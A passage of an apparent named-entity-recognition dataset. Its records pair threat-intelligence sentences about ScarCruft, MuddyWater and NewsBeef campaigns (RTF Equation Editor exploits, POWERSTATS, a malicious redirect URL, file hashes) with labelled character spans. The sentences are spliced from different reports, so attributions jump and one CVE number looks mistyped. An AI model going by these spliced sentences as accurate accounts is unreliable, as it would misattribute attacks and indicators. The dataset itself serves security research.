"label": "Malware"}, {"start": 3674, "end": 3688, "label": "Organization"}, {"start": 3742, "end": 3749, "label": "Organization"}, {"start": 3759, "end": 3773, "label": "Organization"}, {"start": 3867, 
"end": 3875, "label": "Organization"}, {"start": 3915, "end": 3922, "label": "Organization"}, {"start": 3943, "end": 3946, "label": "System"}, {"start": 3966, "end": 3979, "label": "Vulnerability"}, {"start": 3983, "end": 3995, "label": "Indicator"}, {"start": 4006, "end": 4013, "label": "Indicator"}, {"start": 4026, "end": 4037, "label": "Indicator"}, {"start": 4093, "end": 4095, "label": "Indicator"}, {"start": 4187, "end": 4198, "label": "Organization"}, {"start": 4232, "end": 4256, "label": "Organization"}, {"start": 4287, "end": 4296, "label": "Indicator"}, {"start": 4397, "end": 4405, "label": "Vulnerability"}, {"start": 4497, "end": 4514, "label": "Malware"}, {"start": 4519, "end": 4524, "label": "Malware"}, {"start": 4610, "end": 4622, "label": "Organization"}, {"start": 4726, "end": 4735, "label": "Indicator"}, {"start": 4876, "end": 4888, "label": "Indicator"}, {"start": 4929, "end": 4938, "label": "Organization"}, {"start": 4945, "end": 4955, "label": "Indicator"}, {"start": 5014, "end": 5023, "label": "Organization"}, {"start": 5119, "end": 5126, "label": "Organization"}, {"start": 5222, "end": 5228, "label": "Organization"}, {"start": 5284, "end": 5287, "label": "Malware"}, {"start": 5288, "end": 5297, "label": "Malware"}, {"start": 5313, "end": 5320, "label": "Indicator"}, {"start": 5505, "end": 5509, "label": "Organization"}, {"start": 5585, "end": 5596, "label": "Malware"}, {"start": 5601, "end": 5616, "label": "Malware"}, {"start": 5619, "end": 5626, "label": "Indicator"}, {"start": 5652, "end": 5662, "label": "Indicator"}, {"start": 5702, "end": 5706, "label": "Indicator"}, {"start": 5709, "end": 5715, "label": "Organization"}, {"start": 5731, "end": 5748, "label": "Organization"}, {"start": 5775, "end": 5781, "label": "System"}, {"start": 5822, "end": 5829, "label": "System"}, {"start": 5834, "end": 5839, "label": "System"}, {"start": 5895, "end": 5904, "label": "Organization"}, {"start": 5930, "end": 5938, "label": "Organization"}, {"start": 
6173, "end": 6181, "label": "Organization"}, {"start": 6192, "end": 6200, "label": "Malware"}, {"start": 6210, "end": 6215, "label": "Malware"}, {"start": 6321, "end": 6329, "label": "Organization"}, {"start": 6338, "end": 6354, "label": "Malware"}, {"start": 6387, "end": 6395, "label": "Malware"}, {"start": 6396, "end": 6403, "label": "Malware"}, {"start": 6418, "end": 6421, "label": "Organization"}, {"start": 6438, "end": 6446, "label": "Organization"}, {"start": 6685, "end": 6692, "label": "Indicator"}, {"start": 6736, "end": 6752, "label": "Indicator"}, {"start": 6796, "end": 6812, "label": "Indicator"}, {"start": 6834, "end": 6843, "label": "Organization"}, {"start": 6992, "end": 7000, "label": "Malware"}, {"start": 7015, "end": 7020, "label": "Malware"}, {"start": 7055, "end": 7068, "label": "Indicator"}, {"start": 7161, "end": 7170, "label": "Indicator"}, {"start": 7232, "end": 7246, "label": "Indicator"}, {"start": 7266, "end": 7283, "label": "Indicator"}, {"start": 7367, "end": 7380, "label": "Indicator"}, {"start": 7397, "end": 7415, "label": "Indicator"}, {"start": 7514, "end": 7530, "label": "Indicator"}, {"start": 7537, "end": 7545, "label": "Indicator"}, {"start": 7575, "end": 7579, "label": "Organization"}, {"start": 7592, "end": 7597, "label": "Indicator"}, {"start": 7796, "end": 7805, "label": "Organization"}, {"start": 7830, "end": 7837, "label": "Organization"}, {"start": 8046, "end": 8051, "label": "Indicator"}, {"start": 8276, "end": 8281, "label": "Organization"}, {"start": 8294, "end": 8303, "label": "Malware"}, {"start": 8306, "end": 8311, "label": "Malware"}, {"start": 8339, "end": 8367, "label": "Malware"}, {"start": 8422, "end": 8427, "label": "Indicator"}, {"start": 8807, "end": 8815, "label": "Organization"}, {"start": 9006, "end": 9034, "label": "Organization"}, {"start": 9072, "end": 9096, "label": "Organization"}, {"start": 9126, "end": 9134, "label": "Organization"}, {"start": 9217, "end": 9223, "label": "Indicator"}, {"start": 
9327, "end": 9340, "label": "Organization"}, {"start": 9568, "end": 9573, "label": "Organization"}, {"start": 9777, "end": 9788, "label": "Organization"}, {"start": 9800, "end": 9807, "label": "Organization"}, {"start": 9851, "end": 9868, "label": "Malware"}, {"start": 9878, "end": 9888, "label": "Organization"}, {"start": 9933, "end": 9942, "label": "Organization"}, {"start": 10127, "end": 10139, "label": "System"}, {"start": 10178, "end": 10185, "label": "Organization"}, {"start": 10212, "end": 10226, "label": "Malware"}, {"start": 10265, "end": 10275, "label": "System"}, {"start": 10328, "end": 10330, "label": "Organization"}, {"start": 10384, "end": 10391, "label": "System"}, {"start": 10435, "end": 10442, "label": "Indicator"}, {"start": 10491, "end": 10501, "label": "Malware"}, {"start": 10540, "end": 10545, "label": "Organization"}, {"start": 10760, "end": 10765, "label": "Organization"}, {"start": 10880, "end": 10911, "label": "Organization"}, {"start": 10914, "end": 10924, "label": "Organization"}, {"start": 10950, "end": 10980, "label": "Organization"}, {"start": 10994, "end": 11000, "label": "Organization"}, {"start": 11128, "end": 11134, "label": "Organization"}, {"start": 11236, "end": 11242, "label": "Organization"}, {"start": 11346, "end": 11349, "label": "Indicator"}, {"start": 11409, "end": 11417, "label": "Organization"}, {"start": 11563, "end": 11566, "label": "Indicator"}, {"start": 11592, "end": 11601, "label": "Organization"}, {"start": 11679, "end": 11682, "label": "Indicator"}, {"start": 11810, "end": 11815, "label": "Organization"}, {"start": 11906, "end": 11916, "label": "Indicator"}, {"start": 11931, "end": 11934, "label": "Indicator"}, {"start": 12033, "end": 12046, "label": "Organization"}, {"start": 12342, "end": 12349, "label": "Organization"}, {"start": 12397, "end": 12400, "label": "Indicator"}, {"start": 12520, "end": 12525, "label": "Organization"}, {"start": 12616, "end": 12619, "label": "Indicator"}, {"start": 12675, "end": 
12678, "label": "Indicator"}, {"start": 12711, "end": 12716, "label": "Organization"}, {"start": 12730, "end": 12742, "label": "Malware"}, {"start": 12830, "end": 12841, "label": "Malware"}, {"start": 12842, "end": 12844, "label": "Indicator"}, {"start": 12887, "end": 12892, "label": "Organization"}, {"start": 12907, "end": 12925, "label": "Malware"}, {"start": 12943, "end": 12948, "label": "Organization"}, {"start": 12983, "end": 12992, "label": "Organization"}, {"start": 13074, "end": 13078, "label": "Malware"}, {"start": 13179, "end": 13195, "label": "Organization"}, {"start": 13196, "end": 13203, "label": "Malware"}, {"start": 13283, "end": 13290, "label": "Organization"}, {"start": 13314, "end": 13330, "label": "Malware"}, {"start": 13347, "end": 13374, "label": "Malware"}, {"start": 13460, "end": 13469, "label": "Organization"}, {"start": 13482, "end": 13485, "label": "System"}, {"start": 13486, "end": 13493, "label": "Vulnerability"}, {"start": 13505, "end": 13509, "label": "Organization"}, {"start": 13567, "end": 13572, "label": "Malware"}, {"start": 13600, "end": 13603, "label": "System"}, {"start": 13680, "end": 13683, "label": "Indicator"}, {"start": 13739, "end": 13755, "label": "Organization"}, {"start": 13756, "end": 13767, "label": "Malware"}, {"start": 13792, "end": 13801, "label": "Organization"}, {"start": 13948, "end": 13954, "label": "Organization"}, {"start": 13983, "end": 13986, "label": "Indicator"}, {"start": 14050, "end": 14059, "label": "Organization"}, {"start": 14225, "end": 14231, "label": "Organization"}, {"start": 14274, "end": 14279, "label": "Organization"}, {"start": 14386, "end": 14392, "label": "Organization"}, {"start": 14520, "end": 14529, "label": "Organization"}, {"start": 14582, "end": 14588, "label": "Organization"}, {"start": 14597, "end": 14600, "label": "Indicator"}, {"start": 14647, "end": 14659, "label": "Malware"}, {"start": 14662, "end": 14672, "label": "Organization"}, {"start": 14726, "end": 14740, "label": 
"Organization"}, {"start": 14747, "end": 14767, "label": "Organization"}, {"start": 14813, "end": 14819, "label": "Organization"}, {"start": 14830, "end": 14838, "label": "Malware"}, {"start": 14841, "end": 14847, "label": "Malware"}, {"start": 14850, "end": 14857, "label": "Malware"}, {"start": 14864, "end": 14888, "label": "Malware"}, {"start": 14898, "end": 14910, "label": "Malware"}, {"start": 14960, "end": 14966, "label": "Organization"}, {"start": 15020, "end": 15023, "label": "Indicator"}, {"start": 15085, "end": 15091, "label": "Organization"}, {"start": 15092, "end": 15098, "label": "Organization"}, {"start": 15140, "end": 15144, "label": "Organization"}, {"start": 15211, "end": 15227, "label": "Malware"}, {"start": 15228, "end": 15235, "label": "Malware"}, {"start": 15406, "end": 15415, "label": "Organization"}, {"start": 15471, "end": 15480, "label": "Organization"}, {"start": 15563, "end": 15566, "label": "Malware"}, {"start": 15577, "end": 15580, "label": "System"}, {"start": 15667, "end": 15673, "label": "Organization"}, {"start": 15789, "end": 15800, "label": "Organization"}, {"start": 16028, "end": 16037, "label": "Malware"}, {"start": 16040, "end": 16042, "label": "Indicator"}, {"start": 16144, "end": 16153, "label": "Indicator"}, {"start": 16180, "end": 16197, "label": "Indicator"}, {"start": 16328, "end": 16338, "label": "Malware"}, {"start": 16380, "end": 16386, "label": "Organization"}, {"start": 16425, "end": 16432, "label": "Indicator"}, {"start": 16575, "end": 16591, "label": "Organization"}, {"start": 16667, "end": 16670, "label": "Organization"}, {"start": 16780, "end": 16802, "label": "Organization"}, {"start": 16952, "end": 16967, "label": "Malware"}, {"start": 16970, "end": 16977, "label": "Malware"}, {"start": 16980, "end": 16987, "label": "Malware"}, {"start": 17000, "end": 17010, "label": "Malware"}, {"start": 17011, "end": 17018, "label": "Malware"}, {"start": 17147, "end": 17156, "label": "Organization"}, {"start": 17231, "end": 
17234, "label": "Organization"}, {"start": 17501, "end": 17504, "label": "Organization"}, {"start": 17702, "end": 17715, "label": "Malware"}, {"start": 17735, "end": 17740, "label": "Organization"}, {"start": 17787, "end": 17796, "label": "Malware"}, {"start": 17907, "end": 17920, "label": "Organization"}, {"start": 18053, "end": 18056, "label": "Organization"}, {"start": 18152, "end": 18157, "label": "Organization"}, {"start": 18374, "end": 18379, "label": "Organization"}, {"start": 18468, "end": 18475, "label": "Malware"}, {"start": 18486, "end": 18491, "label": "Malware"}, {"start": 18509, "end": 18512, "label": "Malware"}, {"start": 18523, "end": 18528, "label": "Malware"}, {"start": 18550, "end": 18567, "label": "Organization"}, {"start": 18623, "end": 18631, "label": "Organization"}, {"start": 18634, "end": 18639, "label": "Organization"}, {"start": 18727, "end": 18731, "label": "Malware"}, {"start": 18734, "end": 18737, "label": "Malware"}, {"start": 18762, "end": 18784, "label": "Malware"}, {"start": 18832, "end": 18835, "label": "Organization"}, {"start": 19046, "end": 19049, "label": "Organization"}, {"start": 19108, "end": 19117, "label": "Organization"}, {"start": 19118, "end": 19125, "label": "System"}, {"start": 19151, "end": 19156, "label": "Organization"}, {"start": 19255, "end": 19267, "label": "Malware"}, {"start": 19415, "end": 19430, "label": "Malware"}, {"start": 19535, "end": 19540, "label": "Organization"}, {"start": 19680, "end": 19688, "label": "Malware"}, {"start": 19693, "end": 19699, "label": "Malware"}, {"start": 19706, "end": 19709, "label": "Organization"}, {"start": 19793, "end": 19800, "label": "Malware"}, {"start": 19803, "end": 19811, "label": "Malware"}, {"start": 19814, "end": 19821, "label": "Malware"}, {"start": 19824, "end": 19829, "label": "Malware"}, {"start": 19855, "end": 19859, "label": "Malware"}, {"start": 19876, "end": 19885, "label": "Malware"}, {"start": 19890, "end": 19897, "label": "Malware"}, {"start": 20013, 
"end": 20018, "label": "Organization"}, {"start": 20023, "end": 20029, "label": "Organization"}, {"start": 20034, "end": 20037, "label": "Organization"}, {"start": 20143, "end": 20146, "label": "Organization"}, {"start": 20331, "end": 20336, "label": "Organization"}, {"start": 20405, "end": 20413, "label": "Organization"}, {"start": 20433, "end": 20455, "label": "Malware"}, {"start": 20548, "end": 20556, "label": "Organization"}, {"start": 20604, "end": 20609, "label": "Organization"}, {"start": 20637, "end": 20640, "label": "Organization"}, {"start": 20641, "end": 20648, "label": "Malware"}, {"start": 20722, "end": 20729, "label": "System"}, {"start": 20927, "end": 20933, "label": "Organization"}, {"start": 20950, "end": 20953, "label": "Organization"}, {"start": 21007, "end": 21010, "label": "Organization"}, {"start": 21044, "end": 21058, "label": "Organization"}, {"start": 21145, "end": 21150, "label": "Organization"}, {"start": 21175, "end": 21182, "label": "Organization"}, {"start": 21369, "end": 21374, "label": "Organization"}, {"start": 21375, "end": 21389, "label": "Malware"}, {"start": 21525, "end": 21534, "label": "Indicator"}, {"start": 21654, "end": 21658, "label": "Malware"}, {"start": 21679, "end": 21682, "label": "Organization"}, {"start": 21765, "end": 21768, "label": "Organization"}, {"start": 21871, "end": 21876, "label": "Organization"}, {"start": 21879, "end": 21888, "label": "Organization"}, {"start": 21891, "end": 21897, "label": "Organization"}, {"start": 21900, "end": 21907, "label": "Organization"}, {"start": 21910, "end": 21915, "label": "Organization"}, {"start": 21918, "end": 21928, "label": "Organization"}, {"start": 21931, "end": 21938, "label": "Organization"}, {"start": 21943, "end": 21963, "label": "Organization"}, {"start": 22019, "end": 22028, "label": "Organization"}, {"start": 22176, "end": 22180, "label": "Organization"}, {"start": 22262, "end": 22277, "label": "Organization"}, {"start": 22351, "end": 22362, "label": 
"Organization"}, {"start": 22363, "end": 22369, "label": "Organization"}, {"start": 22401, "end": 22404, "label": "Malware"}, {"start": 22440, "end": 22443, "label": "Organization"}, {"start": 22625, "end": 22640, "label": "Organization"}, {"start": 22645, "end": 22651, "label": "Organization"}, {"start": 22699, "end": 22708, "label": "Indicator"}, {"start": 22878, "end": 22880, "label": "System"}, {"start": 23095, "end": 23100, "label": "Organization"}, {"start": 23204, "end": 23212, "label": "Malware"}, {"start": 23263, "end": 23268, "label": "Organization"}, {"start": 23271, "end": 23276, "label": "Organization"}, {"start": 23334, "end": 23340, "label": "Malware"}, {"start": 23390, "end": 23397, "label": "System"}, {"start": 23416, "end": 23420, "label": "Malware"}, {"start": 23425, "end": 23432, "label": "System"}, {"start": 23453, "end": 23460, "label": "Indicator"}, {"start": 23717, "end": 23722, "label": "Organization"}, {"start": 23737, "end": 23748, "label": "Organization"}, {"start": 23751, "end": 23759, "label": "Organization"}, {"start": 23762, "end": 23766, "label": "Organization"}, {"start": 23940, "end": 23945, "label": "Organization"}, {"start": 24222, "end": 24225, "label": "Organization"}, {"start": 24454, "end": 24459, "label": "Organization"}, {"start": 24645, "end": 24650, "label": "Organization"}, {"start": 24667, "end": 24680, "label": "Organization"}, {"start": 24702, "end": 24717, "label": "Organization"}, {"start": 24856, "end": 24859, "label": "System"}, {"start": 24874, "end": 24881, "label": "Organization"}, {"start": 24895, "end": 24916, "label": "Organization"}, {"start": 24975, "end": 24984, "label": "Organization"}, {"start": 24996, "end": 25008, "label": "Organization"}, {"start": 25011, "end": 25016, "label": "Organization"}, {"start": 25078, "end": 25083, "label": "Organization"}, {"start": 25110, "end": 25120, "label": "Organization"}, {"start": 25123, "end": 25130, "label": "Organization"}, {"start": 25133, "end": 25142, 
"label": "Organization"}, {"start": 25145, "end": 25155, "label": "Organization"}, {"start": 25158, "end": 25172, "label": "Organization"}, {"start": 25177, "end": 25183, "label": "Organization"}, {"start": 25190, "end": 25194, "label": "Organization"}, {"start": 25199, "end": 25210, "label": "Organization"}, {"start": 25230, "end": 25237, "label": "Organization"}, {"start": 25294, "end": 25299, "label": "Organization"}, {"start": 25441, "end": 25446, "label": "Organization"}, {"start": 25474, "end": 25497, "label": "Organization"}, {"start": 25510, "end": 25532, "label": "Organization"}, {"start": 25759, "end": 25782, "label": "Organization"}, {"start": 25837, "end": 25852, "label": "Organization"}, {"start": 25920, "end": 25927, "label": "Organization"}, {"start": 25974, "end": 25978, "label": "Organization"}, {"start": 26054, "end": 26057, "label": "Organization"}, {"start": 26186, "end": 26191, "label": "Organization"}, {"start": 26519, "end": 26524, "label": "Organization"}, {"start": 26574, "end": 26580, "label": "Malware"}, {"start": 26585, "end": 26592, "label": "Malware"}, {"start": 26683, "end": 26692, "label": "Organization"}, {"start": 26847, "end": 26852, "label": "Organization"}, {"start": 27007, "end": 27015, "label": "Organization"}, {"start": 27024, "end": 27039, "label": "Organization"}, {"start": 27058, "end": 27063, "label": "Organization"}, {"start": 27112, "end": 27122, "label": "Organization"}, {"start": 27133, "end": 27139, "label": "Organization"}, {"start": 27219, "end": 27230, "label": "Indicator"}, {"start": 27401, "end": 27408, "label": "System"}, {"start": 27423, "end": 27428, "label": "System"}, {"start": 27431, "end": 27438, "label": "System"}, {"start": 27453, "end": 27463, "label": "System"}, {"start": 27585, "end": 27590, "label": "Organization"}, {"start": 27617, "end": 27628, "label": "Malware"}, {"start": 27631, "end": 27640, "label": "Malware"}, {"start": 27643, "end": 27652, "label": "Malware"}, {"start": 27655, "end": 27661, 
"label": "Malware"}, {"start": 27743, "end": 27758, "label": "Organization"}, {"start": 27971, "end": 27976, "label": "Organization"}, {"start": 28127, "end": 28132, "label": "Organization"}, {"start": 28232, "end": 28247, "label": "Organization"}, {"start": 28269, "end": 28274, "label": "Organization"}, {"start": 28568, "end": 28573, "label": "Organization"}, {"start": 28625, "end": 28628, "label": "Organization"}, {"start": 28640, "end": 28657, "label": "Organization"}, {"start": 28768, "end": 28772, "label": "Organization"}, {"start": 28793, "end": 28817, "label": "Organization"}, {"start": 29066, "end": 29072, "label": "Organization"}, {"start": 29185, "end": 29200, "label": "Malware"}, {"start": 29260, "end": 29265, "label": "Organization"}, {"start": 29307, "end": 29316, "label": "Malware"}, {"start": 29330, "end": 29332, "label": "System"}, {"start": 29471, "end": 29477, "label": "Indicator"}, {"start": 29497, "end": 29506, "label": "Indicator"}, {"start": 29538, "end": 29541, "label": "System"}, {"start": 29720, "end": 29738, "label": "Indicator"}, {"start": 29830, "end": 29835, "label": "Organization"}, {"start": 29846, "end": 29852, "label": "Malware"}, {"start": 29857, "end": 29861, "label": "Malware"}, {"start": 29866, "end": 29873, "label": "System"}, {"start": 29972, "end": 29979, "label": "System"}, {"start": 30032, "end": 30037, "label": "Organization"}, {"start": 30072, "end": 30079, "label": "Malware"}, {"start": 30087, "end": 30089, "label": "System"}, {"start": 30107, "end": 30113, "label": "System"}, {"start": 30127, "end": 30134, "label": "System"}, {"start": 30212, "end": 30217, "label": "Malware"}, {"start": 30233, "end": 30244, "label": "Malware"}, {"start": 30268, "end": 30274, "label": "Organization"}, {"start": 30292, "end": 30299, "label": "Malware"}, {"start": 30323, "end": 30332, "label": "Organization"}, {"start": 30417, "end": 30421, "label": "Organization"}, {"start": 30552, "end": 30560, "label": "Organization"}, {"start": 30588, 
"end": 30596, "label": "Organization"}, {"start": 30756, "end": 30762, "label": "Organization"}, {"start": 30778, "end": 30787, "label": "Organization"}, {"start": 30799, "end": 30805, "label": "Malware"}, {"start": 30901, "end": 30904, "label": "System"}, {"start": 30943, "end": 30948, "label": "Malware"}, {"start": 31005, "end": 31010, "label": "Organization"}, {"start": 31046, "end": 31051, "label": "Malware"}, {"start": 31054, "end": 31060, "label": "Malware"}, {"start": 31063, "end": 31069, "label": "Malware"}, {"start": 31072, "end": 31077, "label": "Malware"}, {"start": 31080, "end": 31086, "label": "Malware"}, {"start": 31110, "end": 31116, "label": "Organization"}, {"start": 31159, "end": 31166, "label": "Indicator"}, {"start": 31218, "end": 31221, "label": "System"}, {"start": 31304, "end": 31308, "label": "Indicator"}, {"start": 31311, "end": 31316, "label": "Organization"}, {"start": 31346, "end": 31354, "label": "Malware"}, {"start": 31370, "end": 31391, "label": "Organization"}, {"start": 31407, "end": 31412, "label": "Organization"}, {"start": 31449, "end": 31462, "label": "Malware"}, {"start": 31517, "end": 31522, "label": "Organization"}, {"start": 31551, "end": 31556, "label": "Organization"}, {"start": 31597, "end": 31618, "label": "Malware"}, {"start": 31708, "end": 31720, "label": "Organization"}, {"start": 31766, "end": 31769, "label": "System"}, {"start": 31819, "end": 31832, "label": "Indicator"}, {"start": 31863, "end": 31866, "label": "System"}, {"start": 32057, "end": 32062, "label": "Organization"}, {"start": 32204, "end": 32213, "label": "Malware"}, {"start": 32252, "end": 32255, "label": "System"}, {"start": 32296, "end": 32301, "label": "Organization"}, {"start": 32349, "end": 32362, "label": "Malware"}, {"start": 32480, "end": 32485, "label": "Organization"}, {"start": 32639, "end": 32646, "label": "Organization"}, {"start": 32647, "end": 32656, "label": "Malware"}, {"start": 32702, "end": 32714, "label": "Malware"}, {"start": 32819, 
"end": 32830, "label": "Organization"}, {"start": 32833, "end": 32838, "label": "Indicator"}, {"start": 32844, "end": 32859, "label": "Malware"}, {"start": 32924, "end": 32932, "label": "Organization"}, {"start": 32951, "end": 32957, "label": "Organization"}, {"start": 32974, "end": 32979, "label": "Organization"}, {"start": 32995, "end": 33010, "label": "Organization"}, {"start": 33081, "end": 33089, "label": "Organization"}, {"start": 33103, "end": 33111, "label": "Organization"}, {"start": 33162, "end": 33168, "label": "Malware"}, {"start": 33242, "end": 33245, "label": "System"}, {"start": 33265, "end": 33268, "label": "System"}, {"start": 33288, "end": 33294, "label": "Organization"}, {"start": 33310, "end": 33315, "label": "Organization"}, {"start": 33415, "end": 33423, "label": "Malware"}, {"start": 33454, "end": 33457, "label": "System"}, {"start": 33504, "end": 33507, "label": "System"}, {"start": 33535, "end": 33541, "label": "Organization"}, {"start": 33627, "end": 33634, "label": "Indicator"}, {"start": 33642, "end": 33644, "label": "System"}, {"start": 33651, "end": 33660, "label": "Organization"}, {"start": 33753, "end": 33758, "label": "Malware"}, {"start": 33860, "end": 33865, "label": "Organization"}, {"start": 34099, "end": 34104, "label": "Organization"}, {"start": 34110, "end": 34116, "label": "Malware"}, {"start": 34129, "end": 34137, "label": "Malware"}, {"start": 34141, "end": 34147, "label": "Malware"}, {"start": 34261, "end": 34268, "label": "Malware"}, {"start": 34271, "end": 34277, "label": "Organization"}, {"start": 34330, "end": 34337, "label": "System"}, {"start": 34368, "end": 34376, "label": "Organization"}, {"start": 34492, "end": 34505, "label": "Malware"}, {"start": 34508, "end": 34513, "label": "Organization"}, {"start": 34533, "end": 34542, "label": "Organization"}, {"start": 34543, "end": 34552, "label": "Malware"}, {"start": 34623, "end": 34625, "label": "System"}, {"start": 34713, "end": 34719, "label": "Organization"}, 
{"start": 34829, "end": 34834, "label": "Organization"}, {"start": 34927, "end": 34934, "label": "Organization"}, {"start": 34966, "end": 34970, "label": "Organization"}, {"start": 35400, "end": 35405, "label": "Organization"}, {"start": 35450, "end": 35458, "label": "Organization"}, {"start": 35593, "end": 35598, "label": "Organization"}]} {"text": "Based on the ScarCruft\u2019s recent activities , Kaspersky strongly believes that this ScarCruft group is likely to continue to evolve . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft \u2019s Equation Editor ( EQNEDT32 ) .", "spans": [{"start": 13, "end": 24, "label": "Organization"}, {"start": 45, "end": 54, "label": "Organization"}, {"start": 83, "end": 92, "label": "Organization"}, {"start": 279, "end": 285, "label": "Indicator"}, {"start": 305, "end": 319, "label": "Vulnerability"}, {"start": 323, "end": 336, "label": "Vulnerability"}, {"start": 391, "end": 400, "label": "Indicator"}, {"start": 421, "end": 434, "label": "Vulnerability"}, {"start": 452, "end": 461, "label": "Organization"}, {"start": 465, "end": 480, "label": "System"}, {"start": 483, "end": 491, "label": "System"}]} {"text": "Kaspersky also discovered an interesting piece of rare malware created by this threat actor ScarCruft . Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . 
The earliest use of the exploit ITW we were able to identify and confirm is a sample e228045ef57fb8cc1226b62ada7eee9b dating back to October 2018 ( VirusTotal submission of 2018-10-29 ) with the RTF creation time 2018-10-23 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 92, "end": 101, "label": "Organization"}, {"start": 104, "end": 111, "label": "Organization"}, {"start": 190, "end": 193, "label": "Indicator"}, {"start": 209, "end": 216, "label": "Vulnerability"}, {"start": 221, "end": 234, "label": "Vulnerability"}, {"start": 261, "end": 268, "label": "Vulnerability"}, {"start": 269, "end": 272, "label": "Indicator"}, {"start": 322, "end": 354, "label": "Indicator"}, {"start": 385, "end": 395, "label": "System"}, {"start": 432, "end": 435, "label": "System"}]} {"text": "Kaspersky witnessed the ScarCruft threat actor extensively testing a known public exploit during its preparation for the next campaign . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese Cyber Espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity . Upon decrypting and executing , it drops two additional files wsc_proxy.exe\u201d (legitimate Avast executable) and a malicious DLL wsc.dll\u201d in the %TEMP% folder . However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit ( CVE-2018-0798 ) . Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer . 
These findings also suggest that the threat groups have robust exploit developing capabilities because CVE-2018-0798 is not widely reported on and it is typically not incorporated into publicly available weaponizers . In addition , a current ANY.RUN playback of our observed Elise infection is also available . Upon opening of the MS Word document , our embedded file exploits CVE-2017-11882 to drop a malicious fake Norton Security Shell Extension module , 'NavShExt.dll' , which is then injected into iexplore.exe to install the backdoor , begin collection , and activate command and control . Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , 'EQNEDT32.exe' , scores high for potentially malicious activity . Most recently though , a new campaign , targeting Belarus , Turkey and Ukraine , has emerged that caught the attention of Check Point researchers . The well-crafted and socially engineered malicious documents then become the \ufb01rst stage of a long and mainly \ufb01leless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group . This powerful backdoor can receive commands from the attackers , enabling it to ex\ufb01ltrate \ufb01les from the system it is running on , execute additional scripts , delete \ufb01les , and more . If the macros in SPK KANUN DE\u011e\u0130\u015e\u0130KL\u0130\u011e\u0130 G\u0130B G\u00d6R\u00dc\u015e\u00dc.doc\u201d are enabled , an embedded payload is decoded and saved in the %APPDATA% directory with the name CiscoAny.exe\u201d . INF \ufb01les have been used in the past by MuddyWater , although they were launched using Advpack.dll and not IEAdvpack.dll . In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . 
Although it has focused most of its efforts on the Middle East region , the political af\ufb01liations , motives and purposes behind MuddyWater\u2019s attacks are not very well- de\ufb01ned , thus earning it its name . In the past , countries such as Saudi Arabia , the UAE and Turkey have been a MuddyWater's main target , but the campaigns have also reached a much wider audience , making their ACT to victims in countries such as Belarus and Ukraine . MuddyWater target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments . Most recently MuddyWater were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan . The group has been quite visible since the initial 2017 Malwarebytes report on their elaborate espionage attack against the Saudi Arabian government . Our analysis revealed that they drop a new backdoor , which is written in PowerShell as MuddyWater\u2019s known POWERSTATS backdoor . We assume that RunPow stands for run PowerShell , \u201d and triggers the PowerShell code embedded inside the .dll file . This backdoor has some features similar to a previously discovered version of the Muddywater backdoor . Based on our analysis , we can confirm that MuddyWater target Turkish government organizations related to the finance and energy sectors . This is yet another similarity with previous MuddyWater campaigns , which were known to have targeted multiple Turkish government entities . The main delivery method of this type of backdoor is spear phishing emails or spam that uses social engineering to manipulate targets into enabling malicious documents . Trend Micro\u2122 Deep Discovery\u2122 provides detection , in-depth analysis , and proactive response to today\u2019s stealthy malware , and targeted attacks in real time . MuddyWater first surfaced in 2017 . 
First stage infections and graphical decoys have been described by multiple sources , including in our previous research MuddyWater expands operations . MuddyWater compiles various offensive Python scripts . This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll\u201d , Ext_server_extapi.x64.dll\u201d , and Ext_server_espia.x64.dll\u201d extensions . The January 2017 report followed up on other private reports published on the group\u2019s BeEF-related activity in 2015 and 2016 . Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian and Western targets , and lacks advanced offensive technology development capabilities . However , in the summer of 2016 , NewsBeef deployed a new toolset that includes macro-enabled Office documents , PowerSploit , and the Pupy backdoor . The most recent NewsBeef campaign uses this toolset in conjunction with spearphishing emails , links sent over social media/standalone private messaging applications , and watering hole attacks that leverage compromised high-profile websites some belonging to the SA government . The NewsBeef actor deployed a new toolset in a campaign that focused primarily on Saudi Arabian targets . NewsBeef continues to deploy malicious macro-enabled Office documents , poisoned legitimate Flash and Chrome installers , PowerSploit , and Pupy tools . The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks . On December 25 , 2016 , the NewsBeef APT stood up a server to host a new set of Microsoft Office documents (maintaining malicious macros and PowerShell scripts) to support its spear-phishing operations . These compromised servers include Saudi Arabian government servers and other high-value organizational identities relevant to NewsBeef's targets . 
However , Kaspersky Security Network records also contain links that victims clicked from the Outlook web client outlook.live.com\u201d as well as attachments arriving through the Outlook desktop application . Interestingly , NewsBeef set up its server using the hosting provider Choopa , LLC , US\u201d , the same hosting provider that the group used in attacks over the summer of 2016 . NTG\u2019s IT focus and client list likely aided NewsBeef\u2019s delivery of malicious PowerShell-enabled Office documents and poisoned installers . In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA . The law firm in this scheme is based in the United Kingdom and is the sole location for targets outside of SA for this campaign . Starting in October 2016 , NewsBeef compromised a set of legitimate servers (shown below) , and injected JavaScript to redirect visitors to http://analytics-google.org:69/Check.aspx . For example , on a Saudi government website , the NewsBeef APT delivered packed JavaScript into the bottom of a referenced script that is included in every page served from the site the packed and unpacked JavaScript is shown below . The JavaScript forces visiting web browsers to collect and send (via a POST request) web browser , browser version , country of origin , and IP address data to the 